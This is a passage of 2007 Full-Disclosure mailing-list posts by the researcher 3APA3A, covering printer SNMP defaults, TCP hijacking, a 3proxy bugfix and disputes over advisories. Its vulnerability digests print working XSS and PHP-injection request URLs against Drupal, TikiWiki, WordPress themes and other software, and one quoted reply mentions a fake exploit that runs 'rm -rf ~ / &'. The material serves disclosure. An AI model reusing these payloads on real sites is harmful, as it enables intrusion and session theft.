+--oQQo->{ ^ }<-+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] HP Photosmart vulnerabilities

[3APA3A]

Dear [EMAIL PROTECTED],

SNMP  is  used to monitor printing queue status with LPR or RAW printing
protocol.  This  is  standard  feature  in  e.g.  Windows  and is not HP
specific. You can find this option in port settings.

--Friday, December 28, 2007, 7:01:40 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

uhc> A low price for the printer does not give the vendor a free pass 
uhc> for shipping insecure products.  Since this type of printer is 
uhc> targeted for home/home office use, it would be valid to ask why 
uhc> SNMP is enabled in the first place.  

uhc> Please explain how this printer would be any less easy to use if HP
uhc> had used non default community strings in the firmware?  In a 
uhc> home/home office environment, the only thing that might have a 
uhc> valid need to communicate with the printer via SNMP would be HP's 
uhc> software, which could just as easily use a non default community 
uhc> string.


uhc> On Fri, 28 Dec 2007 09:32:29 -0600 Joshua Levitsky 
uhc> <[EMAIL PROTECTED]> wrote:
>>Do you mean to tell me someone can come to my house and after I 
>>let  
>>them on my network they can see how soon I need toner? Oh crap I  
>>better not let anyone over for New Year's!!!
>>
>>There is a reason it's a $200 home/home office printer. It's not 
>>meant  
>>to sit on the internet. It's not meant to be in a military 
>>facility.  
>>It is meant to be simple to use.
>>
>>I think next I shall contact Sears because I suspect someone can 
>>steal  
>>my water by simply placing a glass up to the front of the fridge  
>>without my knowledge, and I'm not positive but I think they can 
>>take  
>>my ice as well.
>>
>>
>>
>>On Dec 28, 2007, at 10:16 AM, <[EMAIL PROTECTED]> wrote:
>>
>>> HP Photosmart C6280 (and probably other) network printers ship 
>>with
>>> insecure default settings.  The printer ships with SNMP enabled
>>> using the default community strings for both public and private.
>>> HP does not document the use of SNMP, or provide a way for users 
>>to
>>> change the default community strings.  The printer also includes 
>>a
>>> web based admin tool which runs over http, without even an 
>>option
>>> for ssl.
>>>
>>> Several attempts to contact HP have proven futile.
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>___
>>Full-Disclosure - We believe in it.
>>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>Hosted and sponsored by Secunia - http://secunia.com/

uhc> ___
uhc> Full-Disclosure - We believe in it.
uhc> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
uhc> Hosted and sponsored by Secunia - http://secunia.com/


-- 
~/ZARAZA http://securityvulns.com/
Пока вы во власти провидения, вам не удастся умереть раньше срока. (Твен)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] TCP Hijacking (aka Man-in-the-Middle)

[3APA3A]

Dear [EMAIL PROTECTED],


VKve> Thank you, Captain Obvious - I specifically *said* that only one of them
VKve> needs to be blind spoofing.

There  is  a  difference  between "you needn't" and "you can't" and "you
won't".  You  say you needn't spoof another one. I say you won't and you
can't.

VKve> And Michael Zalewski's work showed that even on many boxes that *claim*
VKve> to have RFC1948 randomization, you can do pretty well on the predicting.

I  afraid  you  misunderstanding  or  misinterpreting results of Michael
Zalewski's  work  (which is, by the way, last real "hack" in the initial
meaning  of this word in the field of computer security). In most cases,
you have good probability to guess SN after some number of guesses. E.g.
for  Windows NT 4 you have 100% probability after 5000 guesses. There is
no  OS  with  100% or even 50% probablity after 1 guess. And you have to
remember,  that  result  of  the  guess is not known to you immediately,
because you are spoofing blindly.

-- 
~/ZARAZA http://securityvulns.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] TCP Hijacking (aka Man-in-the-Middle)

[3APA3A]

Dear [EMAIL PROTECTED],

During  blind  TCP  spoofing  you can send data, but you can not receive
one.  That's  why  it's  blind. The general idea is to insert some data,
e.g.  commands  into telnet session or HTTP request into established TCP
connection.  Usually, you have only one packet to insert, because, after
connection is spoofed, sequence number go out of order and hijacked side
will  reply with RST (unless you can blindly guess both sequence numbers
and predict the moment another side will sent some data with accuracy of
approximately  100ms.  In this case both sides can consider extra packet
as  a  duplicate and ignore it).

So,  generally, 1. there is no reason to spoof both connections. 2. it's
only possible if sequence number is 100% (or close to 100%) predictable.

--Friday, October 26, 2007, 1:14:23 AM, you wrote to [EMAIL PROTECTED]:

VKve> On Fri, 26 Oct 2007 00:43:10 +0400, 3APA3A said:

>>  Randomized ISN doesn't protect against MitM.

VKve> Doing  a  MitM  is  basically just spoofing two connections at the
VKve> same  time. If you know how to do one, you know how to do two. And
VKve> if  you  know  how  to do one of them *blind*, it vastly increases
VKve> your  options  (as  you only need to be able to see the traffic in
VKve> one direction rather than both).





-- 
~/ZARAZA http://securityvulns.com/
Если даже вы получите какое-нибудь письмо, вы все равно не сумеете его 
прочитать. (Твен)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] TCP Hijacking (aka Man-in-the-Middle)

[3APA3A]

 Valdis,  you  should  back  to  Cretaceous period, because Oliver talks
 about   man-in-the-middle   attack,   not  about  blind  TCP  spoofing.
 Randomized ISN doesn't protect against MitM.

--Thursday, October 25, 2007, 9:40:53 PM, you wrote to [EMAIL PROTECTED]:

VKve> On Thu, 25 Oct 2007 10:09:47 PDT, Oliver said:

>> I have been searching all over the place to find an answer to this question,
>> but Google has made me feel unlucky these last few days. I hope I could find
>> more expertise here. The burning question I have been pondering over is -
>> could TCP connections be hijacked both ways?

VKve> Quick summary:

VKve> Steve Bellovin pointed out the issue. 19

VKve> Kevin Mitnick exploited it. 19

VKve> Steve wrote RFC1948, which basically said "Use randomized ISNs so the 
attacker
VKve> has to work harder at it". 1996.

VKve> A lot of vendors sort of implemented it. 1996-2000.

VKve> Michael Zalewski did a nice phase-space analysis and showed a lot of 
vendors
VKve> botched it. http://lcamtuf.coredump.cx/oldtcp/tcpseq.html 2000

VKve> A lot of vendors fixed their shit, but a lot didn't.
VKve> http://lcamtuf.coredump.cx/newtcp/ 2001.

VKve> You're now caught up to 6 years ago.


-- 
~/ZARAZA http://securityvulns.com/
Впрочем, важнее всего - алгоритм!  (Лем)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] 3proxy 0.5.3j released (bugfix)

[3APA3A]

3proxy  (  http://3proxy.ru/  ) is multi-platform (Windows, Linux, Unix)
multi-protocol  proxy  server  with abilities to mange traffic flows and
bandwidths,convert   requests   between   different   proxy   types,
authenticate,  authorize,  control,  limit  and account users access and
more.

3proxy   0.5.3j   version   was   released,  to  address  double  free()
vulnerability  in  FTP proxy module (ftppr) reported by Venustech AD-LAB
(CVE-2007-5622).  Vulnerable  3proxy  versions are 0.5 - 0.5.3i. Current
branch (0.6) is not affected.

3proxy 0.5.3j can be downloaded from http://3proxy.ru/download/

Because  of  programming  error resulting in double free() vulnerability
during  the  handling of "OPEN" FTP proxy request, it may be possible to
crash  3proxy service by repeating this request. Reliable code execution
doesn't seem possible.

FTP  proxy  is special non-standard (no RFC specification) type of proxy
server  with  extended  RFC  959  command  set, compatible with only few
graphical  FTP  clients.  It's  not  compatible  with  browsers, because
browsers  use  different, FTP over HTTP proxy. FTP proxy is not commonly
used.

Vulnerability  requires 'ftppr' service to be manually enabled in 3proxy
configuration  file  or  special  'ftppr'  application executed. No over
services  (SOCKS,  HTTP including FTP over HTTP proxy, POP3, TCP and UDP
portmapping, etc) are affected.

Vulnerability  is  of pre-authentication type, but, because FTP proxy in
3proxy  0.5x  branch doesn't support reverse proxing, it should never be
accessible  from  Internet.  Web  scenario with exploitation through the
legitimate  client  is also impossible. Under typical configuration, the
scope of this vulnerability is limited to local network.
  

-- 
http://securityvulns.com/
 /\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] PDF mailto exploit in the wild

[3APA3A]

Dear Paul Szabo,

 Messages  like  this  I've  got are PDF spam without attempt to exploit
 something, and are spammed since July. Not sure about this one though.

--Tuesday, October 23, 2007, 4:18:52 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

PS> In case you are interested... messages like the following were spammed
PS> to my users tonight.



-- 
~/ZARAZA http://securityvulns.com/
Клянусь лысиной пророка Моисея - я тебя сейчас съем. (Твен)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] CallManager and OpeSer toll fraud and authentication forward attack

[3APA3A]

Dear Radu State,

 As  far as I understood the issue, it requires active Man-in-the-Middle
 attack.  Digest authentication, like any authentication without traffic
 encryption  or traffic signing, doesn't protect against active M-i-t-M,
 because   active   M-i-t-M   can  always  force  client  to  use  basic
 authentication  or  to  hijack  the  session  after  authentication  is
 finished.  This is, no doubt, security issue, but it's scope is limited
 to configurations, where client is configured to do not allow cleartext
 authentication  or  where attacker can sniff traffic, but can not spoof
 server reply.

--Friday, October 12, 2007, 8:54:18 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

RS> MADYNES Security Advisory : SIP toll fraud and authentication forward attack

RS> Date of Discovery 5  May, 2007

RS> Vendor1 (Cisco) was informed on 22 May 2007

RS> Vendor 2 (OpenSer,  voice-systems) was informed in 4 th October 2007

RS> ID: KIPH11 

RS> Affected products

 

RS> CallManager:

RS> System version: 5.1.1.3000-5 

RS> Administration version: 1.1.0.0-1

 

RS> OpenSer

 

RS> SVN version until the 4 th October 2007

RS> Version 1.2.2

 

 

RS> Summary 

 

 

RS> The tested systems do not associate a Digest authentication to a dialog
RS> which allows any user who can sniff the traffic to make its own calls on
RS> behalf of the the sniffed device. 


RS> Synopsis

RS> The tested implementations do not allow to check if the provided URI in
RS> the Digest authentication header is the same as the REQUEST-URI of  the
RS> message, which  allows an attacker to call any other extension. This is not
RS> a simple replay attack.

RS> They do not allowed to generate one-time nonces.   These issues will allow a
RS> malicious user able to sniff a Digest  authentication from a regular user,
RS> to call (by spoofing data) any  extension on behalf of the user; as long as
RS> the nonce does not expire.

RS> The first vendor   (Cisco) was informed  in May 2007 and acknowledged the
RS> vulnerability. The second vendor (OpenSer, voice-systems) was informed in
RS> October 2007 and fixed the vulnerabity on the same day.

RS>  This vulnerability was identified by the Madynes research team at INRIA
RS> Lorraine, using the Madynes VoIP fuzzer KIPH. This is one of the first
RS> vulnerabilities published where advanced state tracking is required.

RS> Background 

RS> *   SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP
RS> signalization. SIP is an ASCII based INVITE message is used to initiate and
RS> maintain a communication session. 



RS> Impact :


RS> A malicious user perform toll fraud and call ID spoofing.


RS> Resolution



RS> OpenSer fixed the issue on the 4 th October.  

 

RS> The devel branch was enhanced to export a variable $adu which refer to this
RS> field. It is easy now to check in config file whether it is equal or not
RS> with r-uri:

 

RS> if($adu != $ru)

RS> {

RS> # digest uri and request uri are different 

RS> }

 


RS> Credits

RS> *   Humberto J. Abdelnur (Ph.D Student) 
RS> *   Radu State (Ph.D) 
RS> *   Olivier Festor (Ph.D) 


RS> This vulnerability was identified by the Madynes research team at INRIA
RS> Lorraine, using the Madynes VoIP fuzzer KIF

 

RS> POC: PoC code is available on request

 

 

 



-- 
~/ZARAZA http://securityvulns.com/
Ибо факты есть факты, и изложены они лишь для того, чтобы их поняли и в них 
поверили. (Твен)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft Windows default ZIP handler bug

[3APA3A]

Dear Kristian Erik Hermansen,

Can  not reproduce it on patched Windows XP. May be it's DynaZIP library
buffer overflows fixed with MS04-34.

--Monday, October 15, 2007, 12:19:31 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

KEH> I tested this on three Windows XP machines and was able to make them
KEH> all crash.  There is an issue with the way Microsoft's default

-- 
~/ZARAZA http://securityvulns.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Tikiwiki 1.9.8 exploit ITW

[3APA3A]

Dear Moritz Naumann,

This  vulnerability  was  found  by  ShAnKaR

http://securityvulns.ru/Sdocument162.html

and   reported   on  Bugtraq  yesterday  (see  "Vulnerabilities  digest"
message). TikiWiki developers were informed on October, 8.

--Friday, October 12, 2007, 1:20:06 AM, you wrote to 
full-disclosure@lists.grok.org.uk:


MN> Disabling url_fopen() or denying access to tiki-graph_formula.php for
MN> unauthenticated users will prevent your site from being exploited.

MN> I've notified the developers.

MN> If, what it says on http://dev.tikiwiki.org/Security is up to date (i.e.
MN> unfixed security issues of high priority initially reported 9 months
MN> ago), then you really should not use this software.

-- 
~/ZARAZA http://securityvulns.com/
Человек это тайна... я занимаюсь этой тайной чтобы быть человеком. (Достоевский)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Vulnerabilities digest

[3APA3A]

essage%20+ADw-SCRIPT+AD4-alert('XSS')+ADw-/SCRIPT+AD4-

For Firefox 2.0:

gopher:///1+ADw-SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-

gopher:///1Turn%20on%20UTF-7%20to%20view%20this%20message%20+ADw-SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-

According  to author, it's possible to execute script in both local zone
and context of gopher site.

12.  ShAnKaR  reports  PHP  Zend Hash vulnerability exploitation vector
with Drupal <= 5.2.

Example: 
http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/http://securityvulns.ru/Sdocument137.html

13. ShAnKaR reports PHP injection vulnerability in TikiWiki 1.9.8.

Example: 
http://www.example.com/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=

Original message (in Russian):

http://securityvulns.ru/Sdocument162.html

Also, multiple vulnerabilities were reported in English by

:: iNs @ uNkn0wn.eu :: http://securityvulns.com/source26994.html
and
r0t: http://securityvulns.com/source12948.html










  

-- 
http://securityvulns.com/
 /\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] URI handling woes in Acrobat Reader, Netscape, Miranda, Skype

[3APA3A]

Dear Thierry Zoller,



--Saturday, October 6, 2007, 9:06:51 PM, you wrote to [EMAIL PROTECTED]:

TZ> Dear Geo.,

G>> If the application is what exposes the URI handling routine to untrusted
G>> code from the internet,
TZ> Sorry, Untrusted code from the internet ?

TZ> The user clicks on a mailto link, is that untrusted code?
TZ> Or the mailto link is clicked for him.

What  URL  is  is defined by RFC 1738, what mailto: is is defined by RFC
2368.  String  in  question is definetly _not_ URL because of %xx and ".
Double  quote  is  URL  delimiter and is not a part of URL, in this case
application incorrectly parses and highlights URL (it should stop before
").  %xx  is  invalid character encoding. And altogether it's, for sure,
not  mailto:  URL.  Passing  unchecked  user  input  to  function called
ShellExecute(), where URL is expected, is a bug.

So,  while  there  is a security vulnerability in Windows, there is also
security  vulnerability  in  mIRC,  Acrobat  Reader,  Netscape, Miranda,
Skype,  because  ShellExecute()  behaviour  is  not defined for the case
non-URL data is passed to URL processor.

-- 
~/ZARAZA http://securityvulns.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] iDefense Security Advisory 10.02.07: Sun Microsystems Solaris FIFO FS Information Disclosure Vulnerability

[3APA3A]

Dear iDefense Labs,

--Wednesday, October 3, 2007, 6:32:03 PM, you wrote to [EMAIL PROTECTED]:


iL> The vulnerability exists in the kernel ioctl() handler for FIFOs. The
iL> I_PEEK ioctl is used to peek at a number of bytes contained in the FIFO
iL> without actually removing them from the queue. One of the arguments to
iL> this command, which represents the number of bytes to peek, is a signed
iL> integer value. Since this parameter is not properly validated, a
iL> negative value can cause large amounts of kernel memory to be leaked.

Can  you  please  clarify this issue? According to subject it looks like
information  leak  (information  disclosure)  issue,  while according to
description, it looks more like memory leak (Denial of Service) issue.


-- 
~/ZARAZA http://securityvulns.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Panda Antivirus 2008 Local Privileg Escalation (UPS they did it again)

[3APA3A]

Dear Panda Security Response,


 [EMAIL PROTECTED] was contacted about this same vulnerability in
 Panda  Antivirus  2007  on August, 11 2006 (more than year ago) without
 any results and response, until information was published in Bugtraq.

 As  far,  as  I  can  see, pandasecurity.com is Swedish domain of Panda
 while  pandasoftware.com  is  international  one.  I believe it's quite
 reasonable   to   have  [EMAIL PROTECTED]  to  be  forwarded  to
 [EMAIL PROTECTED], don't you think so?


--Thursday, September 20, 2007, 12:58:42 AM, you wrote to 
full-disclosure@lists.grok.org.uk:

 

PSR> Users of vulnerable 2007 versions should upgrade to Panda Antivirus
PSR> 2008 and apply the fix provided.



PSR> For future vulnerability reporting to Panda please write specifically
PSR> and exclusively to "Panda Security Response"
PSR> <[EMAIL PROTECTED]> instead of generic beta or informational
PSR> contact mailboxes.



PSR> blog:  http://research.pandasoftware.com

-- 
~/ZARAZA http://securityvulns.com/
Да, ему чертовски повезло. Эх и паршиво б ему пришлось если бы он выжил! (Твен)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [USN-515-1] t1lib vulnerability

[3APA3A]

Dear Kees Cook,

CVE-2007-4033  is  "Buffer  overflow  in php_gd2.dll in the gd (PHP_GD2)
extension  in  PHP  5.2.3  allows context-dependent attackers to execute
arbitrary code via a long argument to the imagepsloadfont function."

Please, provide valid CVE entry.

--Thursday, September 20, 2007, 12:18:02 AM, you wrote to [EMAIL PROTECTED]:

KC> === 
KC> Ubuntu Security Notice USN-515-1 September 19, 2007
KC> t1lib vulnerability
KC> CVE-2007-4033
KC> ===


-- 
~/ZARAZA http://securityvulns.com/
Sir Isaac Newton discovered an apple falling to the ground (Mark Twain)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] n.runs-SA-2007.027 - Sophos Antivirus UPX parsing Arbitrary CodeExecution Advisory

[3APA3A]

Dear [EMAIL PROTECTED],

Either  Subject  "UPX  parsing Arbitrary CodeExecution" or vulnerability
description  "Infinite  Loop in UPX packed files parsing" are wrong. Can
you  provide  more  detailed  information  please?  It's  not clear, how
infinite loop can lead to remote code execution.

--Friday, August 24, 2007, 11:15:01 PM, you wrote to [EMAIL PROTECTED]:


snc> Description:

snc> A remotely exploitable vulnerability has been found in the file parsing
snc> engine.

snc> In detail, the following flaw was determined:

snc> - Infinite Loop in UPX packed files parsing


snc> Impact:

snc> This problem can lead to remote denial of service or arbitrary code
snc> execution if an attacker carefully crafts a file that exploits the
snc> aforementioned vulnerability. The vulnerability is present in Sophos
snc> Anti-virus software listed above on all platforms supported by the affected
snc> products prior to the engine Version 2.48.0. 


-- 
~/ZARAZA http://securityvulns.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Vulnerabilities digest

[3APA3A]

Dear [EMAIL PROTECTED],

  there is a number of  vulnerabilities unpublished in English yet

  1.  Dmitry  Zubov  reports  Planet VC-200M VDSL2 router administration
  interface DoS vulnerability.

  HTTP   request   with  missed  Host:  header  prevents  administration
  interface  access  until  reboot. Vendor was reportedly contacted, but
  failed to react.

  SecurityVulns issue: http://securityvulns.com/news/Planet/VC-200M/DoS.html
  Original message (in Russian): http://securityvulns.ru/Rdocument847.html

  2.  MustLive  reports  low-risk  (requires  social  engineering),  yet
  interesting  example of crossite scripting in Internet Explorer. Local
  zone  scripting  is possible on accessing saved page with original URL
  in the form of

  http://site/-->[script]alert("XSS")[/script]

  Internet Explorer 6.0 was tested.

  SecurityVulns Issue: http://securityvulns.com/news/Microsoft/IE/saved-css.html
  Additional Information (in Ukranian): http://websecurity.com.ua/1241/
  Original message (in Russian): http://securityvulns.ru/Rdocument865.html

  3.  MustLive reports crossite scripting vulnerability in Search Engine
  Builder.

  Request
  
http://site/search/search.html?searWords=%3Cscript%3Ealert(document.cookie)%3C/script%3E

  leads to crossite scripting.

  Additional information (in Ukranian): http://websecurity.com.ua/1159/
  Original message (in Russian): http://securityvulns.ru/Rdocument843.html

  4.  MustLive  reports vulnerability in Sirius 1.0, Blix 0.9.1 and Blix
  0.9.1  Rus, Pool 1.0.7 themes for WordPress and also WordPress Classic
  1.5 theme, last one is already fixed in WordPress 2.1.3.
  

  Insuficcient   filtering  of  PHP_SELF  variable  leads  to  crossite
  scripting with request like
  http://site/index.php/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

  Additional information (in Ukranian):
 http://websecurity.com.ua/1252/
 http://websecurity.com.ua/1248/
 http://websecurity.com.ua/1238/
 http://websecurity.com.ua/1234/
  Original messages (in Russian):
 http://securityvulns.ru/Rdocument839.html
 http://securityvulns.ru/Rdocument825.html
 http://securityvulns.ru/Rdocument771.html
 http://securityvulns.ru/Rdocument751.html
  
  5. MustLive reports crossite scripting in coWiki

  with request
  
http://site/?cmd=srchdoc&q=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

  Additional information: http://websecurity.com.ua/1131/
  Original message: http://securityvulns.ru/Rdocument692.html

  6.   Ivan   Nl  (http://uNkn0wn.eu)  reports  vulnerabilities  in
  Linkliste  1.2,  Butterfly online vistors counter 1.08, mcLinksCounter
  1.2, My_REFERER 1.08.

  Original messages in English are available from
  http://securityvulns.com/source26994.html

  7.  Okan  Alp  (http://www.expw0rm.com)  reports  vulnerabilities  in
  different Web applications.

  Original messages in English are available from
  http://securityvulns.com/source13951.html
  



-- 
http://securityvulns.com/
 /\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow

[3APA3A]

Dear Joey Mengele,

Of cause, it's mitigating factor. But:

default  PATH_MAX  under  Linux  is  4096,  and  it's not hard to create
file/folder   with   longer   path,   it's  impossible to access it,

E.g. folder with path longer than PATH_MAX:

bash$ pwd
pwd: could not get current directory: getcwd: cannot access parent directories: 
Result too large
bash$ ls
job-working-directory: could not get current directory: getcwd: cannot access 
parent directories: Result too large

Access   is  not  required  in  this  case.  It's  possible  to  create
_searchable_ files with  the  length  up  to  approximately  MAX_PATH  +
NAME_MAX. It's more than required to exploit (4128).

--Wednesday, August 15, 2007, 9:34:50 PM, you wrote to [EMAIL PROTECTED]:

JM> You are playing handpuppet of the jackass, actually. Check PATH_MAX 
JM> in the Linux Kernel.

JM> J

JM> On Wed, 15 Aug 2007 12:53:18 -0400 monikerd <[EMAIL PROTECTED]> 
JM> wrote:
>>Joey Mengele wrote:
>>> Where does security come into play here? This is a local crash 
>>in a 
>>> non setuid binary. I would like to hear your remote exploitation 
>>
>>> scenario. Or perhaps your local privilege escalation scenario?
>>>
>>> J
>>>
>>>   
>>I'll play advocate of the devil then. Imagine a wiki running on a 
>>webserver,
>>
>>that allows anybody to create new topics which end up in
>>/articles/[Topic].txt
>>with sufficient .htaccess stuff in /articles to twart most usual 
>>attacks ..
>>
>>
>>If you could create an arbitrary long topic, then you *might*
>>be able to execute some code, when some cronjob would scan the 
>>drive
>>and come across the file?
>>
>>creating files is a different privilege than  running code. Hence 
>>imho
>>it's not a bogus advisory.
>>
>>
>>another possibility would be to create an archive that extracts an
>>incredibly
>>long filename perhaps? scanning an archive before/after it's 
>>extracted
>>is a pretty common event i guess.

JM> --
JM> Click for free information on accounting careers, $150 hour potential.
JM> 
http://tagline.hushmail.com/fc/Ioyw6h4dCaNyraR2kkZ8KcMCiTJDWZokEDbswig9iZ5cvsPFFYamWc/

JM> ___
JM> Full-Disclosure - We believe in it.
JM> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
JM> Hosted and sponsored by Secunia - http://secunia.com/


-- 
~/ZARAZA http://securityvulns.com/
...без дубинки никогда не принимался он за программирование. (Лем)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Beyond Security] New sudo off-by-one poc exploit.

[3APA3A]

Dear Andrew Farmer,

And this one is not even new:

http://seclists.org/bugtraq/2005/Jul/0521.html


--Monday, August 6, 2007, 2:40:57 PM, you wrote to [EMAIL PROTECTED]:

AF> On 05 Aug 07, at 15:48, Beyond Security wrote:
>> /*
>>  *  off by one ebp overwrite in sudo prompt parsing function
>>  *  discovered by beyond security in 2007, thx ge
>>  *
>>  *  to compile: gcc -pipe -o sobo sobo.c ; ./sobo
>>  *
>>  *  please use responsibly! a patch has already been sent
>>  *  upstream and a fix will be included in the next sudo release
>>  *
>>  */
AF> 

AF> Smashes its own stack and runs "rm -rf ~ / &". Very clever.


-- 
~/ZARAZA http://securityvulns.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] HORDE VULNERABILITIES

[3APA3A]

Dear Mesut EREN,

http://securityvulns.com/search/soft.asp?sofname=horde

--Thursday, August 2, 2007, 10:09:31 AM, you wrote to 
full-disclosure@lists.grok.org.uk:

ME> Hello everybody 

 

ME> The Horde Mail is any have Vulnerability??

ME> I use to Horde Mail i want to test my email system.. Thanks..

 

ME> M.E.



-- 
~/ZARAZA http://securityvulns.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [AOGBF] Re: BS.Player 2.22 NULL ptr dereference

[3APA3A]

Dear [EMAIL PROTECTED],



 Seems to be Another One George Bush Fan.

You  know,  there  is  vulnerability  in  all  media  players, it can be
exploited  by opening MP3 file with George Bush bathroom singing. George
Bush  fans  are not vulnerable, yet they are still vulnerable to one you
described.



Quote:

 Can  you,  please explain why is this security bug? DoS is not software
 crash,  DoS  is  Denial  of  Service.  It means, security impact of DoS
 vulnerability should be preventing (blocking) access of legitimate user
 to some data or service (via data corruption, service malfuction, etc).



--Friday, August 3, 2007, 4:40:41 AM, you wrote to 
full-disclosure@lists.grok.org.uk:


esvnc>
=
esvnc> Team Intell Security Advisory TISA2007-10-Private
esvnc>
-
esvnc> BS.Player 2.22 NULL pointer dereference
esvnc>
=


-- 
~/ZARAZA http://securityvulns.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Cracking the entire set of DES-based crypt(3) hashes. Interested ?

[3APA3A]

Dear coderman,

Whhooo!  We  will not see SPAM any more, because all botnets will be
overloaded with hash hacking!

--Monday, July 30, 2007, 11:30:51 PM, you wrote to [EMAIL PROTECTED]:

c> On 7/30/07, coderman <[EMAIL PROTECTED]> wrote:
>> gotta pay off that copacobana?  10,000 hashes for breakeven @ $1, not bad...

c> yes, a joke.  you'd need to charge at least $100 hash to make this
c> profitable, maybe down to $40-50 if you could leverage bulk pricing
c> for components.

c> cmon XRR, spill the beans.  a bunch of PS3's?  FPGA array?  quantum search? 
:P


-- 
~/ZARAZA http://securityvulns.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Cracking the entire set of DES-based crypt(3) hashes. Interested ?

[3APA3A]

Dear Tremaine Lea,



--Monday, July 30, 2007, 4:09:53 PM, you wrote to [EMAIL PROTECTED]:

TL> -BEGIN PGP SIGNED MESSAGE-
TL> Hash: SHA1

TL> $1-10/hash, and I'd actively seek/support an open source option.

5-10 days for full bruteforce? John-the-ripper on modern multi-core PC.

-- 
~/ZARAZA http://securityvulns.com/
Итак, я буду краток. (Твен)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Signal to Noise Ratio

[3APA3A]

Dear [EMAIL PROTECTED],

--Tuesday, July 24, 2007, 5:02:16 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

jkc>   It seems to me the average SNR here could be greatly improved with any
jkc> one of several commonly available "community-based" filtering
